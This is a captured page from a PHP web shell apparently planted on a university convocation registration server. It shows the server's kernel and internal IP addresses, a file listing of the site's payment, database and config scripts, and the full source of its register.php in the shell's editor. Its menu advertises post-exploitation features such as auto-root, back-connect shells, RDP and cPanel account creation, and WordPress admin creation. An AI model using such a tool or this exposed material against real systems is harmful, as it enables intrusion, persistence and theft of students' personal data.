Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
conreg /
[ HOME SHELL ]
Name
Size
Permission
Action
admin
[ DIR ]
drwxr-xr-x
bower_components
[ DIR ]
drwxr-xr-x
database
[ DIR ]
drwxr-xr-x
dist
[ DIR ]
drwxr-xr-x
documents
[ DIR ]
drwxr-xr-x
lib
[ DIR ]
drwxr-xr-x
mailer
[ DIR ]
drwxr-xr-x
plugins
[ DIR ]
drwxr-xr-x
uploadDoc
[ DIR ]
drwxr-xr-x
validation
[ DIR ]
drwxr-xr-x
404.php
2.86
KB
-rw-r--r--
changePassword.php
4.67
KB
-rw-r--r--
class.user.php
3.69
KB
-rw-r--r--
common-oldbkp.php
5.19
KB
-rw-r--r--
common.php
5.99
KB
-rw-r--r--
config.php
296
B
-rw-r--r--
dashboard.php
7.11
KB
-rw-r--r--
dbconfig.php
1.31
KB
-rw-r--r--
error_log
5.69
KB
-rw-r--r--
forgotPassword.php
5.28
KB
-rw-r--r--
fpass.php
3.11
KB
-rw-r--r--
google_auth.php
2.06
KB
-rw-r--r--
index-login-bkp.php
5.62
KB
-rw-r--r--
index.php
11.97
KB
-rw-r--r--
logout.php
645
B
-rw-r--r--
logoutgmail.php
977
B
-rw-r--r--
page-top.php
5.8
KB
-rw-r--r--
pay-bkp15722.php
8.49
KB
-rw-r--r--
pay-oldbkp.php
5.39
KB
-rw-r--r--
pay.php
5.15
KB
-rw-r--r--
payNow-oldbkp.php
7.07
KB
-rw-r--r--
payNow.php
7.13
KB
-rw-r--r--
payNowLink-bkp15722.php
10.56
KB
-rw-r--r--
payNowLink.php
8.1
KB
-rw-r--r--
paymentlinkcn.php
7.95
KB
-rw-r--r--
paymentlinkcoa.php
8.33
KB
-rw-r--r--
paymentlinkcyber.php
7.95
KB
-rw-r--r--
paymentlinkdm.php
7.95
KB
-rw-r--r--
paymentlinkds.php
7.95
KB
-rw-r--r--
paymentlinkip.php
8.31
KB
-rw-r--r--
paymentlinkml.php
8.28
KB
-rw-r--r--
paymentlinkos.php
8.28
KB
-rw-r--r--
personalInformations-bkp15722....
16.31
KB
-rw-r--r--
personalInformations.php
19.12
KB
-rw-r--r--
register.php
18.78
KB
-rw-r--r--
registrationVerify.php
2.5
KB
-rw-r--r--
resetpass.php
5.27
KB
-rw-r--r--
verify-bkp15722.php
12.67
KB
-rw-r--r--
verify-oldbkp.php
7.15
KB
-rw-r--r--
verify.php
9.26
KB
-rw-r--r--
viewStudentDetails.php
18.73
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : register.php
<?php session_start(); require_once 'class.user.php'; $reg_user = new USER(); if ( !$reg_user->is_logged_in() ) { $reg_user->redirect( 'index.php' ); } $studentEmailg=$_SESSION['username']; //$studentEmail=$_SESSION['studentEmail']; //echo $studentEmailg; $stmt1 = $reg_user->runQuery( "SELECT * FROM graduated25 WHERE studentEmail=:studentEmail" ); $stmt1->execute( array( ":studentEmail" => $studentEmailg ) ); $row1 = $stmt1->fetch( PDO::FETCH_ASSOC ); /*if(!$studentEmailg){ header('location:logoutgmail.php'); } $stmt1 = $reg_user->runQuery( "SELECT * FROM graduated22 WHERE studentEmail=:studentEmail" ); $stmt1->execute( array( ":studentEmail" => $studentEmailg ) ); $row1 = $stmt1->fetch( PDO::FETCH_ASSOC ); if($studentEmailg != $row1['studentEmail']) { ?> <script> alert("This email is not exist in graduating list. Please contact respective admin on their email id."); window.location = "logoutgmail.php"; </script> <?php } else {*/ if ( isset( $_POST[ 'btn-signup' ] ) ) { $studentName = trim( $_POST[ 'studentName' ] ); $studentEmail = trim( $_POST[ 'studentEmail' ] ); $studentMobile = trim( $_POST[ 'studentMobile' ] ); //$studentPassword = "NA"; $studentPassword = trim( $_POST[ 'dropp' ] ); // added by ankit on 15th sep 23 $Degree = trim( $_POST[ 'Degree' ] ); $studentrollnumber = trim( $_POST[ 'studentrollnumber' ] ); $receivingType = trim( $_POST[ 'receivingType' ] ); $comingwith = trim( $_POST[ 'comingwith' ] ); $gName1 = trim( $_POST[ 'gName1' ] ); $gemail1 = trim( $_POST[ 'gemail1' ] ); $gName2 = trim( $_POST[ 'gName2' ] ); $gemail2 = trim( $_POST[ 'gemail2' ] ); $tokenCode = md5( uniqid( rand() ) ); date_default_timezone_set('Asia/Kolkata'); $regDate= date('d/m/Y h:i:s A'); //$regDate= "NA"; $stmt = $reg_user->runQuery( "SELECT * FROM studentregistration WHERE studentEmail=:studentEmail" ); $stmt->execute( array( ":studentEmail" => $studentEmail ) ); $row = $stmt->fetch( PDO::FETCH_ASSOC ); if ( $stmt->rowCount() > 0 ) { //<strong>Sorry !</strong> This email id is already exists in our database, Please Try through another one. $msg = " <div class='alert alert-error'> <button class='close' data-dismiss='alert'>×</button> Your details are already registered. </div> "; } else { if ( $reg_user->register( $studentName, $studentEmail, $studentMobile, $Degree, $studentrollnumber, $receivingType, $comingwith, $studentPassword, $gName1, $gemail1, $gName2, $gemail2, $regDate, $tokenCode ) ) { $studentID = $reg_user->lasdID(); $key = base64_encode( $studentID ); $studentID = $key; /*$message = " Hello $studentName, <br /><br /> Welcome to IIIT-DELHI's 14th Convcation 2025 Registration Portal. <br/> To complete your registration just click <a href='https://www.iiitd.edu.in/14thconvocation2025/registrationVerify.php?studentID=$studentID&tokenCode=$tokenCode'>HERE</a><br/> <br /><br/> Thanks, IIIT-Delhi Convocation Team";*/ if($studentPassword==""){ $hall=""; } else { $hall= "Hall During Session I: $studentPassword <br/>"; } $message = " Hello $studentName, <br /><br /> You have successfully registered for the IIIT-DELHI's 14th Convocation 2025. You have chosen the following options; <br/> <strong> Receiving the Degree (In Person/In Absentia): $receivingType<br/> $hall Coming With (Own Vehicle/Rented Vehicle): $comingwith<br/> Guest 1: $gName1<br/> Guest 2: $gName2<br/> </strong> <!--<br/> To complete your registration just click <a href='https://www.iiitd.edu.in/14thconvocation2025/registrationVerify.php?studentID=$studentID&tokenCode=$tokenCode'>HERE</a><br/>--> <br /><br/> Thanks, IIIT-Delhi Convocation Team"; $subject = "Registration Confirmation for 14th Convocation 2025 at IIIT-Delhi"; $reg_user->send_mail( $studentEmail, $message, $subject ); $msg = " <div class='alert alert-success'> <button class='close' data-dismiss='alert'>×</button> <strong>Success!</strong> We've sent a confirmation email to $studentEmail for your reference. </div> "; } else { echo "Sorry , Query could not execute..."; } } } ?> <!DOCTYPE html> <html> <meta http-equiv="content-type" content="text/html;charset=utf-8" /> <head> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <title>14th Convocation 2025 @IIIT-DELHI</title> <!-- Tell the browser to be responsive to screen width --> <meta content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no" name="viewport"> <!-- Bootstrap 3.3.7 --> <link rel="stylesheet" href="bower_components/bootstrap/dist/css/bootstrap.min.css"> <!-- Font Awesome --> <link rel="stylesheet" href="bower_components/font-awesome/css/font-awesome.min.css"> <!-- Ionicons --> <link rel="stylesheet" href="bower_components/Ionicons/css/ionicons.min.css"> <!-- Theme style --> <link rel="stylesheet" href="dist/css/AdminLTE.min.css"> <!-- iCheck --> <link rel="stylesheet" href="plugins/iCheck/square/blue.css"> <!-- TODO: Missing CoffeeScript 2 --> <script type="text/javascript" src="http://code.jquery.com/jquery-1.10.1.js"></script> <script type="text/javascript">//<![CDATA[ $(window).load(function(){ $('#password, #confirm_password').on('keyup', function () { if ($('#password').val() == $('#confirm_password').val()) { $('#message').html('Password matching..').css('color', 'green'); } else $('#message').html('Password not matching..').css('color', 'red'); }); }); //]]></script> <!-- HTML5 Shim and Respond.js IE8 support of HTML5 elements and media queries --> <!-- WARNING: Respond.js doesn't work if you view the page via file:// --> <!--[if lt IE 9]> <script src="https://oss.maxcdn.com/html5shiv/3.7.3/html5shiv.min.js"></script> <script src="https://oss.maxcdn.com/respond/1.4.2/respond.min.js"></script> <![endif]--> <!-- Google Font --> <style> .showdiv{ display:none; padding:10px; margin-top:20px; } </style> <link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Source+Sans+Pro:300,400,600,700,300italic,400italic,600italic"> </head> <body class="hold-transition register-page" style="font-weight: bold;"> <div class="register-box" style="width: 80%;"> <div class="register-logo"> <img src="https://www.iiitd.ac.in/sites/default/files/images/logo/style3singlecolorsmall.png" width="50%;"/><br/> <h3><a href="index.php" style="color:#fff;"><strong>Registration Portal for 14th Convocation 2025 on dated 1st November 2025 & Rehearsals dated 30th October 2025 </strong></a></h3> <center><h5><a href="logoutgmail.php" style="color:#FFFFFF;">Logout</a></h5></center></div> <div class="register-box-body"><!--Registration for receiving Degree - In person / In absentia in the Annual Convocation to be held in November,2022 --> <p class="login-box-msg"><strong>Please fill the below details</strong></p> <?php if(isset($msg)) echo $msg; ?> <form class="form-signin" method="post"> <div class="row"> <div class="col-md-6"> <div class="form-group has-feedback"> <label>Student Name (To be printed on your degree certificate)</label> <span style="color:#FF0000;">*</span> <input type="text" name="studentName" class="form-control" placeholder="Full name" value="<?php echo $row1['studentName']; ?>" maxlength="100" required readonly> <span class="glyphicon glyphicon-user form-control-feedback"></span> </div> <div class="form-group has-feedback"> <label>Degree</label> <span style="color:#FF0000;">*</span> <input type="text" name="Degree" class="form-control" placeholder="degree" value="<?php echo $row1['Degree']; ?>" required maxlength="11" readonly> <!--<select name="Degree" class="form-control select2"> <option value="Select">--Select--</option> <option value="BTECH">BTECH</option> <option value="MTECH">MTECH</option> <option value="PHD">PHD</option> </select> --> </div> <div class="form-group has-feedback"> <label>Roll No.</label> <span style="color:#FF0000;">*</span> <input type="text" name="studentrollnumber" class="form-control" placeholder="Roll No." value="<?php echo $row1['rollNumber']; ?>" required maxlength="11" readonly> <span class="glyphicon glyphicon-phone form-control-feedback"></span> </div> <div class="form-group has-feedback"> <label>Email (Institute email id)</label> <span style="color:#FF0000;">*</span> <input type="email" class="form-control" name="studentEmail" placeholder="Email" value="<?php echo $row1['studentEmail'];; ?>" required autocomplete="off" maxlength="100" readonly> <span class="glyphicon glyphicon-envelope form-control-feedback"></span> </div> <div class="form-group has-feedback"> <label>Mobile Number (10 digits only)</label> <span style="color:#FF0000;">*</span> <!--<input type="text" name="studentMobile" class="form-control" placeholder="Mobile No." required maxlength="11"> --> <input type="number" name="studentMobile" class="form-control" placeholder="Mobile Number (10 digits only)" maxlength="10" pattern="[+ 0-9]{14}" required autocomplete="off"> <span class="glyphicon glyphicon-phone form-control-feedback"></span> </div> <div class="form-group has-feedback"> <label>Receiving the degree: In Person/In Absentia</label> <span style="color:#FF0000;">*</span> <select name="receivingType" id="receivingType" class="form-control select2"> <option value="Select">--Select--</option> <option value="In Person">In Person</option> <option value="In Absentia">In Absentia</option> </select> </div> </div> <div class="col-md-6"> <div class="form-group has-feedback"> <label>Coming With: Own Vehicle/Rented Vehicle</label> <span style="color:#FF0000;">*</span> <select name="comingwith" class="form-control select2"> <option value="Select">--Select--</option> <option value="Own Vehicle">Own Vehicle</option> <option value="Rented Vehicle">Rented Vehicle</option> <option value="NA">Not Applicable</option> </select> </div> <div class="form-group has-feedback"> <label>Name of the accompanying Guest 1</label> <input type="text" name="gName1" id="institutionName" class="form-control" placeholder="Guest Name" > <span class="glyphicon glyphicon-user form-control-feedback"></span> </div> <div class="form-group has-feedback"> <label>Email id of accompanying Guest 1 (If Available)</label> <input type="text" name="gemail1" id="institutionName" class="form-control" placeholder="Guest Email" > <span class="glyphicon glyphicon-envelope form-control-feedback"></span> </div> <div class="form-group has-feedback"> <label>Name of the accompanying Guest 2</label> <input type="text" name="gName2" id="institutionName" class="form-control" placeholder="Guest Name" > <span class="glyphicon glyphicon-user form-control-feedback"></span> </div> <div class="form-group has-feedback"> <label>Email id of accompanying Guest 2 (If Available)</label> <input type="text" name="gemail2" id="institutionName" class="form-control" placeholder="Guest Email" > <span class="glyphicon glyphicon-envelope form-control-feedback"></span> </div> <div class="form-group has-feedback showdiv"> <label>The convocation ceremony consists of two Sessions: 1) Main Function (90 minutes) and 2) Degree distribution for each program in separate halls (60 minutes). Please select one of the two options for Session 1 to facilitate the seating arrangements.</label><br/><br/> <label for="optA"> <input type="radio" id="optA" name="dropp" value="Main Hall (C102)" checked> I would like to attend Session 1 of the convocation ceremony alone from the main hall (C102), and my parents/guests will attend the ceremony from the adjacent hall. <span style="color:#ff0000;">Since the entry to the main hall is based on the registration order, make sure you register as early as possible to secure your seat.</span></label><br/><br/> <label for="optB"> <input type="radio" id="optB" name="dropp" value="Adjacent Halls"> I would like to attend Session 1 of the convocation ceremony from the adjacent hall along with my parents/guests. </label> </div> <br/> <!--<div class="form-group has-feedback"> <label>Password</label> <input type="password" id="password" name="password" class="form-control" placeholder="Password" required autocomplete="off"> <span class="glyphicon glyphicon-lock form-control-feedback"></span> </div> <div class="form-group has-feedback"> <label>Confirm Password</label> <input type="password" class="form-control" id="confirm_password" name="confirm_password" placeholder="Retype password" required autocomplete="off"> <span class="glyphicon glyphicon-log-in form-control-feedback"></span> </div> --> <div class="row"> <!--<div class="col-xs-8"> <a href="index.php" class="text-center">SIGN IN</a> <div class="checkbox icheck"> <label> <span id='message'></span> </label> </div> </div> --> <!-- /.col --> <div class="col-xs-4"> <button type="submit" class="btn btn-primary btn-block btn-flat" name="btn-signup">Submit</button> </div> <!-- /.col --> </div> </div> </div> </form> <!-- <div class="social-auth-links text-center"> <p>- OR -</p> <a href="#" class="btn btn-block btn-social btn-facebook btn-flat"><i class="fa fa-facebook"></i> Sign up using Facebook</a> <a href="#" class="btn btn-block btn-social btn-google btn-flat"><i class="fa fa-google-plus"></i> Sign up using Google+</a> </div>--> </div> <!-- /.form-box --> </div> <!-- /.register-box --> <div style="background-color:#FFFFFF; height:auto; width:80%; margin:5% auto; padding:10px;"> <center><h2>Instructions for Graduating Students</h2></center> <!--<h4><strong>For Application Fee</strong></h4> <ul> <li>Step 1 </li> <li>Step 2</li> </ul> --> <hr/> <!--<h4><strong>Instructions to fill the Application Form</strong></h4> --> <ul> <li>Only the students who are graduating with graduation dates of January 21, 2025, June 21, 2025, and September 21, 2025, will be able to fill out this form.</li> <li>The graduating student can join the convocation in Person or receive the degree in Absentia. The definition of in-person or in Absentia is as follows:<br/><br/> <strong>(a) In person:</strong> I have completed my degree requirement, and hence, I am eligible to receive my degree at Convocation 2025. I have also submitted my graduation checklist and cleared all my dues. I hereby confirm that I shall attend the Convocation Rehearsal on 30.10.2025 (Friday) and shall also be present at the Convocation ceremony on 01.11.2025 (Saturday) as per the schedule and instructions notified on the Institute website. I understand that attending the Rehearsal is compulsory, and if I fail to attend the Rehearsal, I will not be allowed to receive my degree in the Convocation ceremony.<br/><br/> <strong>(b) In absentia:</strong> I have completed my degree requirement, submitted my graduation checklist, and cleared all my dues. However, I shall not be able to attend the Convocation and, therefore, request that I may be admitted to the degree in absentia. I also request that my degree certificate be sent by registered post at the address available in ERP. </li> <br/> <li>The convocation ceremony consists of two Sessions: 1) Main Function (90 minutes) and 2) Degree distribution for each program in separate halls (60 minutes). Please select one of the two options for Session 1 to facilitate the seating arrangements. <br/><br/> <strong>i) I would like to attend Session 1 of the convocation ceremony alone from the main hall (C102), and my parents/guests will attend the ceremony from the adjacent hall. <span style="color:#ff0000;">Since the entry to the main hall is based on the registration order, make sure you register as early as possible to secure your seat.</span><br/> ii) I would like to attend Session 1 of the convocation ceremony from the adjacent hall along with my parents/guests.</strong></li> <br/> <li>As we have limited parking space, students are advised to avoid bringing their vehicles. However, if they are bringing their vehicle, they will have to pay the charges for valet parking. Charges will be collected in cash on the day of convocation. The detailed instructions will be shared separately.</li> <li>A maximum of two guests per graduating student will be allowed for those who will attend the rehearsal and receive the degree in person. No request for additional guests will be entertained. </li> <li>For any query, please mail to respective admin i.e. admin-btech@iiitd.ac.in, admin-mtech@iiitd.ac.in and admin-phd@iiitd.ac.in</li> <li>For Technical queries, please mail to admin-web@iiitd.ac.in</li> </ul> </div> <br/> <?php //} ?> <!-- jQuery 3 --> <script src="bower_components/jquery/dist/jquery.min.js"></script> <!-- Bootstrap 3.3.7 --> <script src="bower_components/bootstrap/dist/js/bootstrap.min.js"></script> <!-- iCheck --> <script src="plugins/iCheck/icheck.min.js"></script> <script> $(function () { $('input').iCheck({ checkboxClass: 'icheckbox_square-blue', radioClass: 'iradio_square-blue', increaseArea: '20%' /* optional */ }); }); </script> <!--<script> $(document).ready(function(){ $('#receivingType').on('change', function(){ //var demovalue = $(this).val(); $("div.showdiv").show(); // $("#show").show(); }); }); </script>--> <script> $(document).ready(function(){ $('#receivingType').on('change', function() { if ( this.value == 'In Person') { $(".showdiv").show(); } else { $(".showdiv").hide(); } }); }); </script> </body> </html>
Close